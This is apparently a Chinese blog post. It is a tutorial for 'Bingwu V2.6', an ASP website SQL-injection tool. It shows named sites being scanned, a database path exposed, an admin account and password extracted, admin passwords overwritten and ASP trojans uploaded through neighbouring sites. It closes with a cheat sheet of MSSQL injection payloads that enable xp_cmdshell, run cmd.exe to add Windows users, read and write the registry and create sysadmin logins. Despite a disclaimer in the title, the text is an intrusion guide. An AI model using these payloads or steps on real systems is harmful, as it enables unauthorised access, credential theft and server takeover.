冰舞使用介绍(强烈BS用于攻击别人网站的人,我就是爱害者)

冰舞 V2.6
文: 浪 心
冰舞是一款针对ASP脚本网站的扫描工具。它结合扫描和注射为一体,能够很全面的寻找目标网站存在的漏洞。这里我们花点时间来具体介绍它的使用方法。
一:全站扫描
冰舞 V2.6,可以轻松的寻找到目标网站存在注射和爆库的URL。我们来介绍他的使用方法,打开冰舞,点击整站分析,OK了,在目标网站里输入需要探测的网站,或者URL。支持输入:http://www.xnec.cn 或则http://www.xnec.cn/displaynews.asp?id=102,http://www.xnec.cn/softdown/default.asp这样的URL
我们看下冰舞是如何工作的:如图1:


我们可以看到,“以下列表是可能存在注射漏洞的URL”,下面的列表里显示的是可以注射的地址,而“以下列表是可能存在爆库漏洞的URL” ,下面的列表里显示的是可以爆库的地址。
1) 注射漏洞
当我们获得到http://www.jz.gov.cn/aspsky/list.asp?id=1951这样的地址
说明可以注射(下面的注射里会主要说到)
2) 爆库漏洞
当我们获得到http://www.xnec.cn/softdown/view.asp?id=3 这样的地址
说明可以爆库,我们手动替换最后一个/为%5c就可以测试效果,如我们输入
http://www.xnec.cn/softdown%5cview.asp?id=3
可以看到图2的效果

D:/xnzy/admin/ydxzdate.asa就是数据库的地址
我们需要注意下,可能http://www.xnec.cn/softdown/view.asp?id=3的数据库地址就是
D:/xnzy/softdown/admin/ydxzdate.asa
http://www.xnec.cn/softdown/admin/ydxzdate.asa
如图3

OK了,我们看到他做了不可下载处理,但是我们依然可以利用,在下面的注射的介绍里会具体说。
二:脚本注入
当我们上面获得了可以注射的URL后,我们双击列表里的URL,可以直接来到注射页面,也可以点脚本注入来到注射页面。
我们上面获得了http://www.jz.gov.cn/aspsky/list.asp?id=1951这样的地址,这里手动在后面加and 1=1和and 1=2
我们看到如下2个页面:
http://www.jz.gov.cn/aspsky/list.asp?id=1951%20and%201=1

http://www.jz.gov.cn/aspsky/list.asp?id=1951%20and%201=2

看到没有?
共叙浓浓乡情 共谋发展大计这样字在and 1=2里没有:(,好了,这就是一个关键字。
我们在目标网站里输入http://www.jz.gov.cn/aspsky/list.asp?id=1951
关键字填写为:共叙浓浓乡情
这里需要说下POST和GET的区别,POST是完美的探测,在服务器是没有留下任何信息的,而GET的速度比较快,但是没留下许多信息。我们建议,一般的用户设定为POST,这样比较安全嘛。
好了,我们点击探测漏洞,冰舞会对漏洞进行初步探测,来确定你关键字是否填写正确,并且判断数据库格式。
运行效果如图

我们看到,冰舞提示存在漏洞,并且判断数据库为ACCESS,这里会有2种数据库格式,ACCESS和SQL。无论数据库为什么格式,我们都可以用当前这个画面里的任何功能,而对于SQL,我们可以点击SQL注射进一步探测。
自动填写是否打上钩子,不点上,冰舞会跑完整个字典,在继续下一次探测,而点上后,一但出来结果,就立即跳到下一次探测。
这里我们用点上和不点上,来分别探测,好让大家看到他们不同的地方,有选择的去做,是提高效率与速度的做法。
我们点上自动填写,然后点击自动爆库。出现如图的效果

注意,他所有表都是自动写上去的。
而我们去掉自动填写,再次探测
当提示“猜管理员表工作结束!”的时候我们双击下面列表出现的admin,程序会自动添加到管理员表里,然后需要在次点击自动爆库。依次类推,我们可以完成整个探测。
运行如图:

OK了,关于红色的跨库,我们下面的文章会说到。
到这里我们完成了整个管理员数据库信息的探测,点击开始注入,我们就可以来探测,无论点不点上自动爆库,效果都是一样的:)
程序最后运行如图:

8|jzgov|jz3881133
格式:ID|帐号|密码
冰舞的探测工作已经全部结束!
这里获得的就是管理员的帐号密码。
继续上面的话题,什么是跨库?
我们上面获得了http://www.xnec.cn/softdown/view.asp?id=3
目标站的D:/xnzy/softdown/admin/ydxzdate.asa这样的数据库地址,但是如果它的http://www.xnec.cn/softdown/整个系统里并没有注射,而且数据库做了不可下载处理,怎么办?就这样放弃?不能,我们为什么不试验下他站里是否有其他可用的注射?好了,我们找到了
http://www.xnec.cn/displaynews.asp?id=68 这个可以注射的地址,填写各个参数,上面已经介绍了,这里需要注意下,红色的跨库里写D:/xnzy/softdown/admin/ydxzdate.asa
爆库,探测:)很简单,这不是个常用的功能,但是当入侵陷入绝望的时候,我希望大家能想到它:)
如果判断数据库为SQL?
如图:

我们点击SQL注射,直接选择POST,然后点探测
希望会自动完成所有信息,直到探测所有表结束。如图


我们如何探测字段?
比如我们要探测图片里的admin表,双击表里的admin,系统再次自动探测。


好了,出来了所有字段,我们要探测重要信息,比如只要探测id,username,passwd
双击字段里,你要探测的项目,系统会自动添加到探测字段里。双击探测字段里的项目,会自动删除所选的项目。
好了,一切完成后点击开始探测

怎么样?返回信息里就是我们探测的项目。是不是很方面
强制选择。有时候我们不需要冰舞来帮我们选择时候穷举,是否爆库,我们可以点上强制选择,在选择错误提示关闭还是开启。
SQL修改管理员密码,有时候我们探测到的密码为MD5不可逆加密,而且数据库格式为SQL,冰舞提供了直接修改,他不同与其他软件需要暴力破解,好了,当我们探测到如图的信息

注意数据库SQL,我们点SQL,在修改SQL注射,在“SQL修改管理员密码工具”里
我们先确定密码为几位加密,比如为16位MD5加密,我们要修改ID为168的管理员,输入用户名为你想要的名字,密码为你想要的密码,ID写上168,我们选上16位MD5,点上计算加密,等密码换算成16位后,我们点上开始注射:)呵呵,这样就成功修改了ID为168的管理员帐号密码,怎么样?还不快用你修改后的登入?

上面的文章为我们展示了冰舞给我们带来的奇妙世界,但是冰舞的功能不关关如此,有了管理员密码有什么用?我们要管理员后台登入啊?
三:探测后台
就是自动寻找管理员登入口,我们要找
http://www.wxjy.com.cn/xwzx/ReadNews.asp?NewsID=7294
这个系统的管理员登入,输入目标站为
http://www.wxjy.com.cn/xwzx/ReadNews.asp?NewsID=7294
点上深度探测,点开始探测

什么是深度探测?
比如要探测http://www.wxjy.com.cn/xwzx/ReadNews.asp?NewsID=7294
这样的URL,冰舞会先探测http://www.wxjy.com.cn/xwzx/
在探测http://www.wxjy.com.cn/,直到网站梗目录,是很完全的探测:)
如图我们找到了后台登入,直接在IE浏览器里打开URL,然后用你探测到的,或则修改后的管理员帐号密码登入吧:)
四:跨站列表
有时候自己的网站做的很安全,但是同服务器的其他网站呢?
冰舞加入这个功能,就是寻找其他站的上传漏洞,在通过跨站上传ASP木马,来入侵目标网站,他的操作很简单
打开后有个www.google.com将他修改为你要探测的站,比如www.20nt.net,点击获得IP,当IP出来后,我们发现查询域名数量为可点状态,点他,可以获得当前站的所有同服务器网站。
如图:

怎么样?我们可以点扫描上传来对217个网站做个整体探测:)然后寻找相关的漏洞程序来上传木马,而浪心本人也努力开发冰舞,并且不断完善中
到这里,我们介绍完了冰舞这个软件,目前的版本号为2.6,程序为www.20nt.net,20NT网络安全组的作品,程序作者浪心。

常用的一些命令: 我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢! //看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- //检测是否有读取某数据库的权限 and 1= (Select HAS_DBACCESS('master')) And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- 数字类型 and char(124)%2Buser%2Bchar(124)=0 字符类型 ' and char(124)%2Buser%2Bchar(124)=0 and ''=' 搜索类型 ' and char(124)%2Buser%2Bchar(124)=0 and '%'=' 爆用户名 and user>0 ' and user>0 and ''=' 检测是否为SA权限 and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- 检测是不是MSSQL数据库 and exists (select * from sysobjects);-- 检测是否支持多行 ;declare @d int;-- 恢复 xp_cmdshell ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') //----------------------- // 执行命令 //----------------------- 首先开启沙盘模式: exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 然后利用jet.oledb执行系统命令 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")') 执行命令 ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';-- EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111' 判断xp_cmdshell扩展存储过程是否存在: http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') 写注册表 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 REG_SZ 读注册表 exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit' 读取目录内容 exec master..xp_dirtree 'c:\winnt\system32\',1,1 数据库备份 backup database pubs to disk = 'c:\123.bak' //爆出长度 And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;-- 更改sa口令方法:用sql综合利用工具连接后,执行命令: exec sp_password NULL,'新密码','sa' 添加和删除一个SA权限的用户test: exec master.dbo.sp_addlogin test,ptlove exec master.dbo.sp_addsrvrolemember test,sysadmin
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值